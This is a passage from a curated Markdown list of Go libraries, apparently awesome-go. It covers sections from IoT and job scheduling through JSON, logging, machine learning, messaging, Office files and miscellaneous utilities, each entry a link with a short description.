- [mainflux](https://github.com/Mainflux/mainflux) - Industrial IoT Messaging and Device Management Server.
- [periph](https://periph.io/) - Peripherals I/O to interface with low-level board facilities.
- [sensorbee](https://github.com/sensorbee/sensorbee) - Lightweight stream processing engine for IoT.
**[⬆ back to top](#contents)**
## Job Scheduler
_Libraries for scheduling jobs._
- [cdule](https://github.com/deepaksinghvi/cdule) - Job scheduler library with database support
- [cheek](https://github.com/datarootsio/cheek) - A simple crontab like scheduler that aims to offer a KISS approach to job scheduling.
- [clockwerk](https://github.com/onatm/clockwerk) - Go package to schedule periodic jobs using a simple, fluent syntax.
- [cronticker](https://github.com/krayzpipes/cronticker) - A ticker implementation to support cron schedules.
- [Dagu](https://github.com/dagu-go/dagu) - No-code workflow executor. it executes DAGs defined in a simple YAML format.
- [go-cron](https://github.com/rk/go-cron) - Simple Cron library for go that can execute closures or functions at varying intervals, from once a second to once a year on a specific date and time. Primarily for web applications and long running daemons.
- [go-quartz](https://github.com/reugn/go-quartz) - Simple, zero-dependency scheduling library for Go.
- [gocron](https://github.com/go-co-op/gocron) - Easy and fluent Go job scheduling. This is an actively maintained fork of [jasonlvhit/gocron](https://github.com/jasonlvhit/gocron).
- [goflow](https://github.com/fieldryand/goflow) - A simple but powerful DAG scheduler and dashboard.
- [gron](https://github.com/roylee0704/gron) - Define time-based tasks using a simple Go API and Gron’s scheduler will run them accordingly.
- [gronx](https://github.com/adhocore/gronx) - Cron expression parser, task runner and daemon consuming crontab like task list.
- [JobRunner](https://github.com/bamzi/jobrunner) - Smart and featureful cron job scheduler with job queuing and live monitoring built in.
- [jobs](https://github.com/albrow/jobs) - Persistent and flexible background jobs library.
- [leprechaun](https://github.com/kilgaloon/leprechaun) - Job scheduler that supports webhooks, crons and classic scheduling.
- [sched](https://github.com/romshark/sched) - A job scheduler with the ability to fast-forward time.
- [scheduler](https://github.com/carlescere/scheduler) - Cronjobs scheduling made easy.
- [tasks](https://github.com/madflojo/tasks) - An easy to use in-process scheduler for recurring tasks in Go.
**[⬆ back to top](#contents)**
## JSON
_Libraries for working with JSON._
- [ajson](https://github.com/spyzhov/ajson) - Abstract JSON for golang with JSONPath support.
- [ask](https://github.com/simonnilsson/ask) - Easy access to nested values in maps and slices. Works in combination with encoding/json and other packages that "Unmarshal" arbitrary data into Go data-types.
- [dynjson](https://github.com/cocoonspace/dynjson) - Client-customizable JSON formats for dynamic APIs.
- [ej](https://github.com/lucassscaravelli/ej) - Write and read JSON from different sources succinctly.
- [epoch](https://github.com/vtopc/epoch) - Contains primitives for marshaling/unmarshaling Unix timestamp/epoch to/from build-in time.Time type in JSON.
- [fastjson](https://github.com/valyala/fastjson) - Fast JSON parser and validator for Go. No custom structs, no code generation, no reflection.
- [gjo](https://github.com/skanehira/gjo) - Small utility to create JSON objects.
- [GJSON](https://github.com/tidwall/gjson) - Get a JSON value with one line of code.
- [go-jsonerror](https://github.com/ddymko/go-jsonerror) - Go-JsonError is meant to allow us to easily create json response errors that follow the JsonApi spec.
- [go-respond](https://github.com/nicklaw5/go-respond) - Go package for handling common HTTP JSON responses.
- [gojmapr](https://github.com/limiu82214/gojmapr) - Get simple struct from complex json by json path.
- [gojq](https://github.com/elgs/gojq) - JSON query in Golang.
- [gojson](https://github.com/ChimeraCoder/gojson) - Automatically generate Go (golang) struct definitions from example JSON.
- [htmljson](https://github.com/nikolaydubina/htmljson) - Rich rendering of JSON as HTML in Go.
- [JayDiff](https://github.com/yazgazan/jaydiff) - JSON diff utility written in Go.
- [jettison](https://github.com/wI2L/jettison) - Fast and flexible JSON encoder for Go.
- [jscan](https://github.com/romshark/jscan) - High performance zero-allocation JSON iterator.
- [JSON-to-Go](https://mholt.github.io/json-to-go/) - Convert JSON to Go struct.
- [JSON-to-Proto](https://json-to-proto.github.io/) - Convert JSON to Protobuf online.
- [json2go](https://github.com/m-zajac/json2go) - Advanced JSON to Go struct conversion. Provides package that can parse multiple JSON documents and create struct to fit them all.
- [jsonapi-errors](https://github.com/AmuzaTkts/jsonapi-errors) - Go bindings based on the JSON API errors reference.
- [jsoncolor](https://github.com/neilotoole/jsoncolor) - Drop-in replacement for `encoding/json` that outputs colorized JSON.
- [jsondiff](https://github.com/wI2L/jsondiff) - JSON diff library for Go based on RFC6902 (JSON Patch).
- [jsonf](https://github.com/miolini/jsonf) - Console tool for highlighted formatting and struct query fetching JSON.
- [jsongo](https://github.com/ricardolonga/jsongo) - Fluent API to make it easier to create Json objects.
- [jsonhal](https://github.com/RichardKnop/jsonhal) - Simple Go package to make custom structs marshal into HAL compatible JSON responses.
- [jsonhandlers](https://github.com/abusomani/jsonhandlers) - JSON library to expose simple handlers that lets you easily read and write json from various sources.
- [jsonic](https://github.com/sinhashubham95/jsonic) - Utilities to handle and query JSON without defining structs in a type safe manner.
- [jsonvalue](https://github.com/Andrew-M-C/go.jsonvalue) - A fast and convinient library for unstructured JSON data, replacing `encoding/json`.
- [jzon](https://github.com/zerosnake0/jzon) - JSON library with standard compatible API/behavior.
- [kazaam](https://github.com/Qntfy/kazaam) - API for arbitrary transformation of JSON documents.
- [mapslice-json](https://github.com/mickep76/mapslice-json) - Go MapSlice for ordered marshal/ unmarshal of maps in JSON.
- [marshmallow](https://github.com/PerimeterX/marshmallow) - Performant JSON unmarshaling for flexible use cases.
- [mp](https://github.com/sanbornm/mp) - Simple cli email parser. It currently takes stdin and outputs JSON.
- [OjG](https://github.com/ohler55/ojg) - Optimized JSON for Go is a high performance parser with a variety of additional JSON tools including JSONPath.
- [omg.jsonparser](https://github.com/dedalqq/omg.jsonparser) - Simple JSON parser with validation by condition via golang struct fields tags.
- [ujson](https://github.com/olvrng/ujson) - Fast and minimal JSON parser and transformer that works on unstructured JSON.
- [vjson](https://github.com/miladibra10/vjson) - Go package for validating JSON objects with declaring a JSON schema with fluent API.
**[⬆ back to top](#contents)**
## Logging
_Libraries for generating and working with log files._
- [distillog](https://github.com/amoghe/distillog) - distilled levelled logging (think of it as stdlib + log levels).
- [glg](https://github.com/kpango/glg) - glg is simple and fast leveled logging library for Go.
- [glo](https://github.com/lajosbencz/glo) - PHP Monolog inspired logging facility with identical severity levels.
- [glog](https://github.com/golang/glog) - Leveled execution logs for Go.
- [go-cronowriter](https://github.com/utahta/go-cronowriter) - Simple writer that rotate log files automatically based on current date and time, like cronolog.
- [go-log](https://github.com/pieterclaerhout/go-log) - A logging library with stack traces, object dumping and optional timestamps.
- [go-log](https://github.com/subchen/go-log) - Simple and configurable Logging in Go, with level, formatters and writers.
- [go-log](https://github.com/siddontang/go-log) - Log lib supports level and multi handlers.
- [go-log](https://github.com/ian-kent/go-log) - Log4j implementation in Go.
- [go-logger](https://github.com/apsdehal/go-logger) - Simple logger of Go Programs, with level handlers.
- [gologger](https://github.com/sadlil/gologger) - Simple easy to use log lib for go, logs in Colored Console, Simple Console, File or Elasticsearch.
- [gomol](https://github.com/aphistic/gomol) - Multiple-output, structured logging for Go with extensible logging outputs.
- [gone/log](https://github.com/One-com/gone/tree/master/log) - Fast, extendable, full-featured, std-lib source compatible log library.
- [httpretty](https://github.com/henvic/httpretty) - Pretty-prints your regular HTTP requests on your terminal for debugging (similar to http.DumpRequest).
- [journald](https://github.com/ssgreg/journald) - Go implementation of systemd Journal's native API for logging.
- [kemba](https://github.com/clok/kemba) - A tiny debug logging tool inspired by [debug](https://github.com/visionmedia/debug), great for CLI tools and applications.
- [log](https://github.com/aerogo/log) - An O(1) logging system that allows you to connect one log to multiple writers (e.g. stdout, a file and a TCP connection).
- [log](https://github.com/apex/log) - Structured logging package for Go.
- [log](https://github.com/go-playground/log) - Simple, configurable and scalable Structured Logging for Go.
- [log](https://github.com/teris-io/log) - Structured log interface for Go cleanly separates logging facade from its implementation.
- [log](https://github.com/heartwilltell/log) - Simple leveled logging wrapper around standard log package.
- [log](https://github.com/no-src/log) - A simple logging framework out of the box.
- [log-voyage](https://github.com/firstrow/logvoyage) - Full-featured logging saas written in golang.
- [log15](https://github.com/inconshreveable/log15) - Simple, powerful logging for Go.
- [logdump](https://github.com/ewwwwwqm/logdump) - Package for multi-level logging.
- [logex](https://github.com/chzyer/logex) - Golang log lib, supports tracking and level, wrap by standard log lib.
- [logger](https://github.com/azer/logger) - Minimalistic logging library for Go.
- [logmatic](https://github.com/borderstech/logmatic) - Colorized logger for Golang with dynamic log level configuration.
- [logo](https://github.com/mbndr/logo) - Golang logger to different configurable writers.
- [logrus](https://github.com/Sirupsen/logrus) - Structured logger for Go.
- [logrusiowriter](https://github.com/cabify/logrusiowriter) - `io.Writer` implementation using [logrus](https://github.com/sirupsen/logrus) logger.
- [logrusly](https://github.com/sebest/logrusly) - [logrus](https://github.com/sirupsen/logrus) plug-in to send errors to a [Loggly](https://www.loggly.com/).
- [logur](https://github.com/logur/logur) - An opinionated logger interface and collection of logging best practices with adapters and integrations for well-known libraries ([logrus](https://github.com/sirupsen/logrus), [go-kit log](https://github.com/go-kit/kit/tree/master/log), [zap](https://github.com/uber-go/zap), [zerolog](https://github.com/rs/zerolog), etc).
- [logutils](https://github.com/hashicorp/logutils) - Utilities for slightly better logging in Go (Golang) extending the standard logger.
- [logxi](https://github.com/mgutz/logxi) - 12-factor app logger that is fast and makes you happy.
- [lumberjack](https://github.com/natefinch/lumberjack) - Simple rolling logger, implements io.WriteCloser.
- [mlog](https://github.com/jbrodriguez/mlog) - Simple logging module for go, with 5 levels, an optional rotating logfile feature and stdout/stderr output.
- [noodlog](https://github.com/gyozatech/noodlog) - Parametrized JSON logging library which lets you obfuscate sensitive data and marshal any kind of content. No more printed pointers instead of values, nor escape chars for the JSON strings.
- [onelog](https://github.com/francoispqt/onelog) - Onelog is a dead simple but very efficient JSON logger. It is the fastest JSON logger out there in all scenarios. Also, it is one of the logger with the lowest allocation.
- [ozzo-log](https://github.com/go-ozzo/ozzo-log) - High performance logging supporting log severity, categorization, and filtering. Can send filtered log messages to various targets (e.g. console, network, mail).
- [phuslu/log](https://github.com/phuslu/log) - High performance structured logging.
- [pp](https://github.com/k0kubun/pp) - Colored pretty printer for Go language.
- [rollingwriter](https://github.com/arthurkiller/rollingWriter) - RollingWriter is an auto-rotate `io.Writer` implementation with multi policies to provide log file rotation.
- [seelog](https://github.com/cihub/seelog) - Logging functionality with flexible dispatching, filtering, and formatting.
- [slf4g](https://github.com/echocat/slf4g) - Simple Logging Facade for Golang: Simple structured logging; but powerful, extendable and customizable, with huge amount of learnings from decades of past logging frameworks.
- [slog](https://github.com/gookit/slog) - Lightweight, configurable, extensible logger for Go.
- [slog-formatter](https://github.com/samber/slog-formatter) - Common formatters for slog and helpers to build your own.
- [slog-multi](https://github.com/samber/slog-multi) - Chain of slog.Handler (pipeline, fanout...).
- [spew](https://github.com/davecgh/go-spew) - Implements a deep pretty printer for Go data structures to aid in debugging.
- [sqldb-logger](https://github.com/simukti/sqldb-logger) - A logger for Go SQL database driver without modify existing \*sql.DB stdlib usage.
- [stdlog](https://github.com/alexcesaro/log) - Stdlog is an object-oriented library providing leveled logging. It is very useful for cron jobs.
- [structy/log](https://github.com/structy/log) - A simple to use log system, minimalist but with features for debugging and differentiation of messages.
- [tail](https://github.com/hpcloud/tail) - Go package striving to emulate the features of the BSD tail program.
- [tint](https://github.com/lmittmann/tint) - A slog.Handler that writes tinted logs.
- [xlog](https://github.com/xfxdev/xlog) - Plugin architecture and flexible log system for Go, with level ctrl, multiple log target and custom log format.
- [xlog](https://github.com/rs/xlog) - Structured logger for `net/context` aware HTTP handlers with flexible dispatching.
- [xylog](https://github.com/xybor-x/xylog) - Leveled and structured logging, dynamic fields, high performance, zone management, simple configuration, and readable syntax.
- [yell](https://github.com/jfcg/yell) - Yet another minimalistic logging library.
- [zap](https://github.com/uber-go/zap) - Fast, structured, leveled logging in Go.
- [zax](https://github.com/yuseferi/zax) - Integrate Context with Zap logger, which leads to more flexibility in Go logging.
- [zerolog](https://github.com/rs/zerolog) - Zero-allocation JSON logger.
- [zkits-logger](https://github.com/edoger/zkits-logger) - A powerful zero-dependency JSON logger.
**[⬆ back to top](#contents)**
## Machine Learning
_Libraries for Machine Learning._
- [bayesian](https://github.com/jbrukh/bayesian) - Naive Bayesian Classification for Golang.
- [CloudForest](https://github.com/ryanbressler/CloudForest) - Fast, flexible, multi-threaded ensembles of decision trees for machine learning in pure Go.
- [ddt](https://github.com/sgrodriguez/ddt) - Dynamic decision tree, create trees defining customizable rules.
- [eaopt](https://github.com/MaxHalford/eaopt) - An evolutionary optimization library.
- [evoli](https://github.com/khezen/evoli) - Genetic Algorithm and Particle Swarm Optimization library.
- [fonet](https://github.com/Fontinalis/fonet) - A Deep Neural Network library written in Go.
- [go-cluster](https://github.com/e-XpertSolutions/go-cluster) - Go implementation of the k-modes and k-prototypes clustering algorithms.
- [go-deep](https://github.com/patrikeh/go-deep) - A feature-rich neural network library in Go.
- [go-fann](https://github.com/white-pony/go-fann) - Go bindings for Fast Artificial Neural Networks(FANN) library.
- [go-featureprocessing](https://github.com/nikolaydubina/go-featureprocessing) - Fast and convenient feature processing for low latency machine learning in Go.
- [go-galib](https://github.com/thoj/go-galib) - Genetic Algorithms library written in Go / golang.
- [go-pr](https://github.com/daviddengcn/go-pr) - Pattern recognition package in Go lang.
- [gobrain](https://github.com/goml/gobrain) - Neural Networks written in go.
- [godist](https://github.com/e-dard/godist) - Various probability distributions, and associated methods.
- [goga](https://github.com/tomcraven/goga) - Genetic algorithm library for Go.
- [GoLearn](https://github.com/sjwhitworth/golearn) - General Machine Learning library for Go.
- [golinear](https://github.com/danieldk/golinear) - liblinear bindings for Go.
- [GoMind](https://github.com/surenderthakran/gomind) - A simplistic Neural Network Library in Go.
- [goml](https://github.com/cdipaolo/goml) - On-line Machine Learning in Go.
- [gonet](https://github.com/dathoangnd/gonet) - Neural Network for Go.
- [Goptuna](https://github.com/c-bata/goptuna) - Bayesian optimization framework for black-box functions written in Go. Everything will be optimized.
- [goRecommend](https://github.com/timkaye11/goRecommend) - Recommendation Algorithms library written in Go.
- [gorgonia](https://github.com/gorgonia/gorgonia) - graph-based computational library like Theano for Go that provides primitives for building various machine learning and neural network algorithms.
- [gorse](https://github.com/zhenghaoz/gorse) - An offline recommender system backend based on collaborative filtering written in Go.
- [goscore](https://github.com/asafschers/goscore) - Go Scoring API for PMML.
- [gosseract](https://github.com/otiai10/gosseract) - Go package for OCR (Optical Character Recognition), by using Tesseract C++ library.
- [libsvm](https://github.com/datastream/libsvm) - libsvm golang version derived work based on LIBSVM 3.14.
- [m2cgen](https://github.com/BayesWitnesses/m2cgen) - A CLI tool to transpile trained classic ML models into a native Go code with zero dependencies, written in Python with Go language support.
- [neat](https://github.com/jinyeom/neat) - Plug-and-play, parallel Go framework for NeuroEvolution of Augmenting Topologies (NEAT).
- [neural-go](https://github.com/schuyler/neural-go) - Multilayer perceptron network implemented in Go, with training via backpropagation.
- [ocrserver](https://github.com/otiai10/ocrserver) - A simple OCR API server, seriously easy to be deployed by Docker and Heroku.
- [onnx-go](https://github.com/owulveryck/onnx-go) - Go Interface to Open Neural Network Exchange (ONNX).
- [probab](https://github.com/ThePaw/probab) - Probability distribution functions. Bayesian inference. Written in pure Go.
- [randomforest](https://github.com/malaschitz/randomForest) - Easy to use Random Forest library for Go.
- [regommend](https://github.com/muesli/regommend) - Recommendation & collaborative filtering engine.
- [shield](https://github.com/eaigner/shield) - Bayesian text classifier with flexible tokenizers and storage backends for Go.
- [tfgo](https://github.com/galeone/tfgo) - Easy to use Tensorflow bindings: simplifies the usage of the official Tensorflow Go bindings. Define computational graphs in Go, load and execute models trained in Python.
- [Varis](https://github.com/Xamber/Varis) - Golang Neural Network.
**[⬆ back to top](#contents)**
## Messaging
_Libraries that implement messaging systems._
- [ami](https://github.com/kak-tus/ami) - Go client to reliable queues based on Redis Cluster Streams.
- [amqp](https://github.com/rabbitmq/amqp091-go) - Go RabbitMQ Client Library.
- [APNs2](https://github.com/sideshow/apns2) - HTTP/2 Apple Push Notification provider for Go — Send push notifications to iOS, tvOS, Safari and OSX apps.
- [Asynq](https://github.com/hibiken/asynq) - A simple, reliable, and efficient distributed task queue for Go built on top of Redis.
- [Beaver](https://github.com/Clivern/Beaver) - A real time messaging server to build a scalable in-app notifications, multiplayer games, chat apps in web and mobile apps.
- [Benthos](https://github.com/Jeffail/benthos) - A message streaming bridge between a range of protocols.
- [Bus](https://github.com/mustafaturan/bus) - Minimalist message bus implementation for internal communication.
- [Centrifugo](https://github.com/centrifugal/centrifugo) - Real-time messaging (Websockets or SockJS) server in Go.
- [Chanify](https://github.com/chanify/chanify) - A push notification server send message to your iOS devices.
- [Commander](https://github.com/jeroenrinzema/commander) - A high-level event driven consumer/producer supporting various "dialects" such as Apache Kafka.
- [Confluent Kafka Golang Client](https://github.com/confluentinc/confluent-kafka-go) - confluent-kafka-go is Confluent's Golang client for Apache Kafka and the Confluent Platform.
- [dbus](https://github.com/godbus/dbus) - Native Go bindings for D-Bus.
- [drone-line](https://github.com/appleboy/drone-line) - Sending [Line](https://at.line.me/en) notifications using a binary, docker or Drone CI.
- [emitter](https://github.com/olebedev/emitter) - Emits events using Go way, with wildcard, predicates, cancellation possibilities and many other good wins.
- [event](https://github.com/agoalofalife/event) - Implementation of the pattern observer.
- [EventBus](https://github.com/asaskevich/EventBus) - The lightweight event bus with async compatibility.
- [gaurun-client](https://github.com/osamingo/gaurun-client) - Gaurun Client written in Go.
- [Glue](https://github.com/desertbit/glue) - Robust Go and Javascript Socket Library (Alternative to Socket.io).
- [go-mq](https://github.com/cheshir/go-mq) - RabbitMQ client with declarative configuration.
- [go-notify](https://github.com/TheCreeper/go-notify) - Native implementation of the freedesktop notification spec.
- [go-nsq](https://github.com/nsqio/go-nsq) - the official Go package for NSQ.
- [go-res](https://github.com/jirenius/go-res) - Package for building REST/real-time services where clients are synchronized seamlessly, using NATS and Resgate.
- [go-socket.io](https://github.com/googollee/go-socket.io) - socket.io library for golang, a realtime application framework.
- [go-vitotrol](https://github.com/maxatome/go-vitotrol) - Client library to Viessmann Vitotrol web service.
- [Gollum](https://github.com/trivago/gollum) - A n:m multiplexer that gathers messages from different sources and broadcasts them to a set of destinations.
- [golongpoll](https://github.com/jcuga/golongpoll) - HTTP longpoll server library that makes web pub-sub simple.
- [gopush-cluster](https://github.com/Terry-Mao/gopush-cluster) - gopush-cluster is a go push server cluster.
- [gorush](https://github.com/appleboy/gorush) - Push notification server using [APNs2](https://github.com/sideshow/apns2) and google [GCM](https://github.com/google/go-gcm).
- [gosd](https://github.com/alexsniffin/gosd) - A library for scheduling when to dispatch a message to a channel.
- [guble](https://github.com/smancke/guble) - Messaging server using push notifications (Google Firebase Cloud Messaging, Apple Push Notification services, SMS) as well as websockets, a REST API, featuring distributed operation and message-persistence.
- [hare](https://github.com/leozz37/hare) - A user friendly library for sending messages and listening to TCP sockets.
- [hub](https://github.com/leandro-lugaresi/hub) - A Message/Event Hub for Go applications, using publish/subscribe pattern with support for alias like rabbitMQ exchanges.
- [jazz](https://github.com/socifi/jazz) - A simple RabbitMQ abstraction layer for queue administration and publishing and consuming of messages.
- [machinery](https://github.com/RichardKnop/machinery) - Asynchronous task queue/job queue based on distributed message passing.
- [mangos](https://github.com/nanomsg/mangos) - Pure go implementation of the Nanomsg ("Scalability Protocols") with transport interoperability.
- [melody](https://github.com/olahol/melody) - Minimalist framework for dealing with websocket sessions, includes broadcasting and automatic ping/pong handling.
- [Mercure](https://github.com/dunglas/mercure) - Server and library to dispatch server-sent updates using the Mercure protocol (built on top of Server-Sent Events).
- [messagebus](https://github.com/vardius/message-bus) - messagebus is a Go simple async message bus, perfect for using as event bus when doing event sourcing, CQRS, DDD.
- [mob](https://github.com/erni27/mob) - mob is a generic-based, simple mediator / event aggregator library. It supports in-process requests / events processing.
- [NATS Go Client](https://github.com/nats-io/nats) - Lightweight and high performance publish-subscribe and distributed queueing messaging system - this is the Go library.
- [nsq-event-bus](https://github.com/rafaeljesus/nsq-event-bus) - A tiny wrapper around NSQ topic and channel.
- [oplog](https://github.com/dailymotion/oplog) - Generic oplog/replication system for REST APIs.
- [pubsub](https://github.com/tuxychandru/pubsub) - Simple pubsub package for go.
- [Quamina](https://github.com/timbray/quamina) - Fast pattern-matching for filtering messages and events.
- [rabbus](https://github.com/rafaeljesus/rabbus) - A tiny wrapper over amqp exchanges and queues.
- [rabtap](https://github.com/jandelgado/rabtap) - RabbitMQ swiss army knife cli app.
- [RapidMQ](https://github.com/sybrexsys/RapidMQ) - RapidMQ is a lightweight and reliable library for managing of the local messages queue.
- [Ratus](https://github.com/hyperonym/ratus) - Ratus is a RESTful asynchronous task queue server.
- [redisqueue](https://github.com/robinjoseph08/redisqueue) - redisqueue provides a producer and consumer of a queue that uses Redis streams.
- [rmqconn](https://github.com/sbabiv/rmqconn) - RabbitMQ Reconnection. Wrapper over amqp.Connection and amqp.Dial. Allowing to do a reconnection when the connection is broken before forcing the call to the Close () method to be closed.
- [sarama](https://github.com/Shopify/sarama) - Go library for Apache Kafka.
- [Uniqush-Push](https://github.com/uniqush/uniqush-push) - Redis backed unified push service for server-side notifications to mobile devices.
- [Watermill](https://github.com/ThreeDotsLabs/watermill) - Working efficiently with message streams. Building event driven applications, enabling event sourcing, RPC over messages, sagas. Can use conventional pub/sub implementations like Kafka or RabbitMQ, but also HTTP or MySQL binlog.
- [zmq4](https://github.com/pebbe/zmq4) - Go interface to ZeroMQ version 4. Also available for [version 3](https://github.com/pebbe/zmq3) and [version 2](https://github.com/pebbe/zmq2).
**[⬆ back to top](#contents)**
## Microsoft Office
- [unioffice](https://github.com/unidoc/unioffice) - Pure go library for creating and processing Office Word (.docx), Excel (.xlsx) and Powerpoint (.pptx) documents.
### Microsoft Excel
_Libraries for working with Microsoft Excel._
- [excelize](https://github.com/xuri/excelize) - Golang library for reading and writing Microsoft Excel™ (XLSX) files.
- [exl](https://github.com/go-the-way/exl) - Excel binding to struct written in Go.(Only supports Go1.18+)
- [go-excel](https://github.com/szyhf/go-excel) - A simple and light reader to read a relate-db-like excel as a table.
- [goxlsxwriter](https://github.com/fterrag/goxlsxwriter) - Golang bindings for libxlsxwriter for writing XLSX (Microsoft Excel) files.
- [xlsx](https://github.com/tealeg/xlsx) - Library to simplify reading the XML format used by recent version of Microsoft Excel in Go programs.
- [xlsx](https://github.com/plandem/xlsx) - Fast and safe way to read/update your existing Microsoft Excel files in Go programs.
**[⬆ back to top](#contents)**
## Miscellaneous
### Dependency Injection
_Libraries for working with dependency injection._
- [alice](https://github.com/magic003/alice) - Additive dependency injection container for Golang.
- [di](https://github.com/goava/di) - A dependency injection container for go programming language.
- [dig](https://github.com/uber-go/dig) - A reflection based dependency injection toolkit for Go.
- [dingo](https://github.com/i-love-flamingo/dingo) - A dependency injection toolkit for Go, based on Guice.
- [do](https://github.com/samber/do) - A dependency injection framework based on Generics.
- [fx](https://github.com/uber-go/fx) - A dependency injection based application framework for Go (built on top of dig).
- [gocontainer](https://github.com/vardius/gocontainer) - Simple Dependency Injection Container.
- [goioc/di](https://github.com/goioc/di) - Spring-inspired Dependency Injection Container.
- [GoLobby/Container](https://github.com/golobby/container) - GoLobby Container is a lightweight yet powerful IoC dependency injection container for the Go programming language.
- [google/wire](https://github.com/google/wire) - Automated Initialization in Go.
- [HnH/di](https://github.com/HnH/di) - DI container library that is focused on clean API and flexibility.
- [kinit](https://github.com/go-kata/kinit) - Customizable dependency injection container with the global mode, cascade initialization and panic-safe finalization.
- [linker](https://github.com/logrange/linker) - A reflection based dependency injection and inversion of control library with components lifecycle support.
- [nject](https://github.com/muir/nject) - A type safe, reflective framework for libraries, tests, http endpoints, and service startup.
- [wire](https://github.com/Fs02/wire) - Strict Runtime Dependency Injection for Golang.
**[⬆ back to top](#contents)**
### Project Layout
_**Unofficial** set of patterns for structuring projects._
- [ardanlabs/service](https://github.com/ardanlabs/service) - A [starter kit](https://github.com/ardanlabs/service/wiki) for building production grade scalable web service applications.
- [cookiecutter-golang](https://github.com/lacion/cookiecutter-golang) - A Go application boilerplate template for quick starting projects following production best practices.
- [go-module](https://github.com/octomation/go-module) - Template for a typical module written on Go.
- [go-sample](https://github.com/zitryss/go-sample) - A sample layout for Go application projects with the real code.
- [go-starter](https://github.com/allaboutapps/go-starter) - An opinionated production-ready RESTful JSON backend template, highly integrated with VSCode DevContainers.
- [go-todo-backend](https://github.com/Fs02/go-todo-backend) - Go Todo Backend example using modular project layout for product microservice.
- [gobase](https://github.com/wajox/gobase) - A simple skeleton for golang application with basic setup for real golang application.
- [golang-standards/project-layout](https://github.com/golang-standards/project-layout) - Set of common historical and emerging project layout patterns in the Go ecosystem. Note: despite the org-name they do not represent official golang standards, see [this issue](https://github.com/golang-standards/project-layout/issues/117) for more information. Nonetheless, some may find the layout useful.
- [golang-templates/seed](https://github.com/golang-templates/seed) - Go application GitHub repository template.
- [insidieux/inizio](https://github.com/insidieux/inizio) - Golang project layout generator with plugins.
- [modern-go-application](https://github.com/sagikazarmark/modern-go-application) - Go application boilerplate and example applying modern practices.
- [pagoda](https://github.com/mikestefanello/pagoda) - Rapid, easy full-stack web development starter kit built in Go.
- [scaffold](https://github.com/catchplay/scaffold) - Scaffold generates a starter Go project layout. Lets you focus on business logic implemented.
- [wangyoucao577/go-project-layout](https://github.com/wangyoucao577/go-project-layout) - Set of practices and discussions on how to structure Go project layout.
**[⬆ back to top](#contents)**
### Strings
_Libraries for working with strings._
- [bexp](https://github.com/mkungla/bexp) - Go implementation of Brace Expansion mechanism to generate arbitrary strings.
- [caps](https://github.com/chanced/caps) - A case conversion library.
- [go-formatter](https://gitlab.com/tymonx/go-formatter) - Implements **replacement fields** surrounded by curly braces `{}` format strings.
- [gobeam/Stringy](https://github.com/gobeam/Stringy) - String manipulation library to convert string to camel case, snake case, kebab case / slugify etc.
- [strutil](https://github.com/ozgio/strutil) - String utilities.
- [sttr](https://github.com/abhimanyu003/sttr) - cross-platform, cli app to perform various operations on string.
- [xstrings](https://github.com/huandu/xstrings) - Collection of useful string functions ported from other languages.
**[⬆ back to top](#contents)**
### Uncategorized
_These libraries were placed here because none of the other categories seemed to fit._
- [anagent](https://github.com/mudler/anagent) - Minimalistic, pluggable Golang evloop/timer handler with dependency-injection.
- [antch](https://github.com/antchfx/antch) - A fast, powerful and extensible web crawling & scraping framework.
- [archiver](https://github.com/mholt/archiver) - Library and command for making and extracting .zip and .tar.gz archives.
- [autoflags](https://github.com/artyom/autoflags) - Go package to automatically define command line flags from struct fields.
- [avgRating](https://github.com/kirillDanshin/avgRating) - Calculate average score and rating based on Wilson Score Equation.
- [banner](https://github.com/dimiro1/banner) - Add beautiful banners into your Go applications.
- [base64Captcha](https://github.com/mojocn/base64Captcha) - Base64captch supports digit, number, alphabet, arithmetic, audio and digit-alphabet captcha.
- [basexx](https://github.com/bobg/basexx) - Convert to, from, and between digit strings in various number bases.
- [battery](https://github.com/distatus/battery) - Cross-platform, normalized battery information library.
- [bitio](https://github.com/icza/bitio) - Highly optimized bit-level Reader and Writer for Go.
- [browscap_go](https://github.com/digitalcrab/browscap_go) - GoLang Library for [Browser Capabilities Project](https://browscap.org/).
- [captcha](https://github.com/steambap/captcha) - Package captcha provides an easy to use, unopinionated API for captcha generation.
- [common](https://github.com/kubeservice-stack/common) - A library for server framework.
- [conv](https://github.com/cstockton/go-conv) - Package conv provides fast and intuitive conversions across Go types.
- [datacounter](https://github.com/miolini/datacounter) - Go counters for readers/writer/http.ResponseWriter.
- [faker](https://github.com/neotoolkit/faker) - Fake data generator.
- [faker](https://github.com/pioz/faker) - Random fake data and struct generator for Go.
- [ffmt](https://github.com/go-ffmt/ffmt) - Beautify data display for Humans.
- [gatus](https://github.com/TwinProduction/gatus) - Automated service health dashboard.
- [go-commandbus](https://github.com/lana/go-commandbus) - A slight and pluggable command-bus for Go.
- [go-commons-pool](https://github.com/jolestar/go-commons-pool) - Generic object pool for Golang.
- [go-openapi](https://github.com/go-openapi) - Collection of packages to parse and utilize open-api schemas.
- [go-resiliency](https://github.com/eapache/go-resiliency) - Resiliency patterns for golang.
- [go-unarr](https://github.com/gen2brain/go-unarr) - Decompression library for RAR, TAR, ZIP and 7z archives.
- [gofakeit](https://github.com/brianvoe/gofakeit) - Random data generator written in go.
- [gommit](https://github.com/antham/gommit) - Analyze git commit messages to ensure they follow defined patterns.
- [gopsutil](https://github.com/shirou/gopsutil) - Cross-platform library for retrieving process and system utilization(CPU, Memory, Disks, etc).
- [gosh](https://github.com/osamingo/gosh) - Provide Go Statistics Handler, Struct, Measure Method.
- [gosms](https://github.com/haxpax/gosms) - Your own local SMS gateway in Go that can be used to send SMS.
- [gotoprom](https://github.com/cabify/gotoprom) - Type-safe metrics builder wrapper library for the official Prometheus client.
- [gountries](https://github.com/pariz/gountries) - Package that exposes country and subdivision data.
- [gtree](https://github.com/ddddddO/gtree) - Provide CLI, Package and Web for tree output and directories creation from Markdown or programmatically.
- [health](https://github.com/alexliesenfeld/health) - A simple and flexible health check library for Go.
- [health](https://github.com/dimiro1/health) - Easy to use, extensible health check library.
- [healthcheck](https://github.com/etherlabsio/healthcheck) - An opinionated and concurrent health-check HTTP handler for RESTful services.
- [hostutils](https://github.com/Wing924/hostutils) - A golang library for packing and unpacking FQDNs list.
- [indigo](https://github.com/osamingo/indigo) - Distributed unique ID generator of using Sonyflake and encoded by Base58.
- [lk](https://github.com/hyperboloide/lk) - A simple licensing library for golang.
- [llvm](https://github.com/llir/llvm) - Library for interacting with LLVM IR in pure Go.
- [metrics](https://github.com/pascaldekloe/metrics) - Library for metrics instrumentation and Prometheus exposition.
- [morse](https://github.com/alwindoss/morse) - Library to convert to and from morse code.
